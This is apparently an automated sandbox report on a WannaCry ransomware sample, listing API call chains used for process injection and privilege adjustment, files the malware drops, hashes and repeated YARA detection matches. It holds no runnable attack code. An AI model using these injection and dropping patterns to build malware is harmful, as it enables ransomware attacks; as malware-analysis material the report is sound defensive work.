Source: C:\Windows\mssecsvc.exe	Code function: 12_2_7FE405F2 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle,	12_2_7FE405F2
Source: C:\Windows\mssecsvc.exe	Code function: 12_2_7FE424AE lstrcpyW,lstrlenW,NtCreateSection,	12_2_7FE424AE
Source: C:\Windows\mssecsvc.exe	Code function: 12_2_7FE42574 NtMapViewOfSection,CloseHandle,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,	12_2_7FE42574
Source: C:\Windows\mssecsvc.exe	Code function: 12_2_7FE42477 NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory,	12_2_7FE42477
Source: C:\Windows\mssecsvc.exe	Code function: 12_2_7FE4144A LookupPrivilegeValueA,NtAdjustPrivilegesToken,	12_2_7FE4144A
Source: C:\Windows\mssecsvc.exe	Code function: 12_2_7FE41422 LookupPrivilegeValueA,NtAdjustPrivilegesToken,	12_2_7FE41422
Source: C:\Windows\mssecsvc.exe	Code function: 12_2_7FE4042D GetModuleHandleA,GetVersion,VirtualAlloc,CloseHandle,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,	12_2_7FE4042D
Source: C:\Windows\mssecsvc.exe	Code function: 12_2_7FE4252F NtOpenSection,	12_2_7FE4252F
Source: C:\Windows\mssecsvc.exe	Code function: 12_2_7FE43405 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	12_2_7FE43405
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_00AA05F2 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CloseHandle,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle,	17_2_00AA05F2
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_00AA252F NtOpenSection,	17_2_00AA252F
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_00AA042D GetModuleHandleA,GetVersion,VirtualAlloc,CloseHandle,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,	17_2_00AA042D
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_00AA116F LoadLibraryA,GetModuleHandleA,lstrcat,lstrcatW,CreateEventA,CreateFileMappingA,GetDriveTypeA,GetFileAttributesA,GetFileTime,GetModuleFileNameA,GetSystemTime,GetTempPathA,GetVersion,GetVersionExA,MapViewOfFile,SetEndOfFile,SetFileAttributesA,UnmapViewOfFile,WriteFile,LookupPrivilegeValueA,NtAdjustPrivilegesToken,	17_2_00AA116F
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_00AA2477 NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory,	17_2_00AA2477
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_00AA2574 NtMapViewOfSection,CloseHandle,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,	17_2_00AA2574
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_00AA24AE lstrcpyW,lstrlenW,NtCreateSection,	17_2_00AA24AE
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_00AA33E0 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	17_2_00AA33E0
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_00AA1422 LookupPrivilegeValueA,NtAdjustPrivilegesToken,	17_2_00AA1422
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_00AA3405 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	17_2_00AA3405
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_00AA144A LookupPrivilegeValueA,NtAdjustPrivilegesToken,	17_2_00AA144A
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_7FE433E0 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	17_2_7FE433E0
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_7FE405F2 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle,	17_2_7FE405F2
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_7FE424AE lstrcpyW,lstrlenW,NtCreateSection,	17_2_7FE424AE
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_7FE42574 NtMapViewOfSection,CloseHandle,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,	17_2_7FE42574
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_7FE42477 NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory,	17_2_7FE42477
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_7FE4144A LookupPrivilegeValueA,NtAdjustPrivilegesToken,	17_2_7FE4144A
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_7FE41422 LookupPrivilegeValueA,NtAdjustPrivilegesToken,	17_2_7FE41422
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_7FE4042D GetModuleHandleA,GetVersion,VirtualAlloc,CloseHandle,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,	17_2_7FE4042D
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_7FE4252F NtOpenSection,	17_2_7FE4252F
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_7FE43405 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,	17_2_7FE43405

Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\WINDOWS\mssecsvc.exe	Jump to behavior
Source: C:\Windows\mssecsvc.exe	File created: C:\WINDOWS\tasksche.exe	Jump to behavior
Source: C:\Windows\System32\lsass.exe	File created: C:\Windows\system32\Microsoft\Protect\S-1-5-18\User\c8310f0f-9ec7-4a2b-8c40-fbafee991f65	Jump to behavior
Source: C:\Windows\System32\lsass.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D	Jump to behavior
Source: C:\Windows\System32\lsass.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D	Jump to behavior
Source: C:\Windows\mssecsvc.exe	File created: C:\WINDOWS\tasksche.exe	Jump to behavior

Source: C:\Windows\System32\lsass.exe

File deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D

Jump to behavior

Source: C:\Windows\mssecsvc.exe	Code function: 6_2_00AD116F	6_2_00AD116F
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_00AD3CF0	6_2_00AD3CF0
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_00AD28C8	6_2_00AD28C8
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_00AD3CC2	6_2_00AD3CC2
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_00AD3C3D	6_2_00AD3C3D
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_00AD3D36	6_2_00AD3D36
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_00AD3D1F	6_2_00AD3D1F
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_00AD3D4B	6_2_00AD3D4B
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_7FE33CF0	6_2_7FE33CF0
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_7FE33CC2	6_2_7FE33CC2
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_7FE328C8	6_2_7FE328C8
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_7FE34C9E	6_2_7FE34C9E
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_7FE33D4B	6_2_7FE33D4B
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_7FE33D36	6_2_7FE33D36
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_7FE33C3D	6_2_7FE33C3D
Source: C:\Windows\mssecsvc.exe	Code function: 6_2_7FE33D1F	6_2_7FE33D1F
Source: C:\Windows\mssecsvc.exe	Code function: 12_2_7FE43CF0	12_2_7FE43CF0
Source: C:\Windows\mssecsvc.exe	Code function: 12_2_7FE43CC2	12_2_7FE43CC2
Source: C:\Windows\mssecsvc.exe	Code function: 12_2_7FE428C8	12_2_7FE428C8
Source: C:\Windows\mssecsvc.exe	Code function: 12_2_7FE44C9E	12_2_7FE44C9E
Source: C:\Windows\mssecsvc.exe	Code function: 12_2_7FE43D4B	12_2_7FE43D4B
Source: C:\Windows\mssecsvc.exe	Code function: 12_2_7FE43D36	12_2_7FE43D36
Source: C:\Windows\mssecsvc.exe	Code function: 12_2_7FE43C3D	12_2_7FE43C3D
Source: C:\Windows\mssecsvc.exe	Code function: 12_2_7FE43D1F	12_2_7FE43D1F
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_00AA116F	17_2_00AA116F
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_00AA3CF0	17_2_00AA3CF0
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_00AA28C8	17_2_00AA28C8
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_00AA3CC2	17_2_00AA3CC2
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_00AA3C3D	17_2_00AA3C3D
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_00AA3D36	17_2_00AA3D36
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_00AA3D1F	17_2_00AA3D1F
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_00AA3D4B	17_2_00AA3D4B
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_7FE43CF0	17_2_7FE43CF0
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_7FE43CC2	17_2_7FE43CC2
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_7FE428C8	17_2_7FE428C8
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_7FE44C9E	17_2_7FE44C9E
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_7FE43D4B	17_2_7FE43D4B
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_7FE43D36	17_2_7FE43D36
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_7FE43C3D	17_2_7FE43C3D
Source: C:\Windows\mssecsvc.exe	Code function: 17_2_7FE43D1F	17_2_7FE43D1F

Source: Joe Sandbox View

Dropped File: C:\Windows\tasksche.exe 2584E1521065E45EC3C17767C065429038FC6291C091097EA8B22C8A502C41DD

Source: mssecsvc.exe.4.dr	Static PE information: Resource name: R type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: tasksche.exe.12.dr	Static PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate

Source: GeW4GzT8G8.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL

Source: GeW4GzT8G8.dll, type: SAMPLE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: GeW4GzT8G8.dll, type: SAMPLE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 17.2.mssecsvc.exe.24f28c8.8.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 17.2.mssecsvc.exe.1fc7084.4.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 12.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 12.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 12.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 12.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 12.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 12.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 17.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 17.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 17.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 17.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 17.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 17.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 17.2.mssecsvc.exe.1ff9128.3.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 17.2.mssecsvc.exe.1ff9128.3.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 17.2.mssecsvc.exe.1ff9128.3.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 17.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 17.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 17.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 17.2.mssecsvc.exe.252496c.9.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 17.2.mssecsvc.exe.252496c.9.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 17.2.mssecsvc.exe.252496c.9.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 17.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 17.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 17.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 17.2.mssecsvc.exe.2501948.7.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 17.2.mssecsvc.exe.2501948.7.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 17.2.mssecsvc.exe.2501948.7.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 12.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 12.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 17.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 17.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 17.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 17.2.mssecsvc.exe.1fd6104.5.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 17.2.mssecsvc.exe.1fd6104.5.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 17.2.mssecsvc.exe.1fd6104.5.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 17.2.mssecsvc.exe.2501948.7.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 17.2.mssecsvc.exe.2501948.7.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 17.2.mssecsvc.exe.1fd20a4.2.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
